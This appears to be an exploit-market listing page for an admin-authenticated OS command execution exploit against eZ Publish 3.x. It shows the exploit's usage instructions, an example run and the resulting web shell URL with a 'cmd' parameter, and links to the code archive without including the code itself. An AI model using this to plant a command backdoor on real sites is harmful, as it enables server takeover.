[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)

Author
s4avrd0w
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4416
Category
web applications
Date add
11-12-2008
Platform
unsorted
===================================================================
eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)
===================================================================

/*
    eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
    Versions affected 3.x
 
    * tested on version 3.9.0, 3.9.5, 3.10.1
 
    usage:  
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
 
    The options are required:
 
    -u Login of the exists admin on eZ Publish
    -p Admin password on eZ Publish
    -s Target eZ Publish admin interface
 
    example:
 
    # ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
    [+] Exploit successfully sending
    [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

Exploit: inj3ct0r.com/sploits/4416.zip



#  0day.today [2024-11-15]  #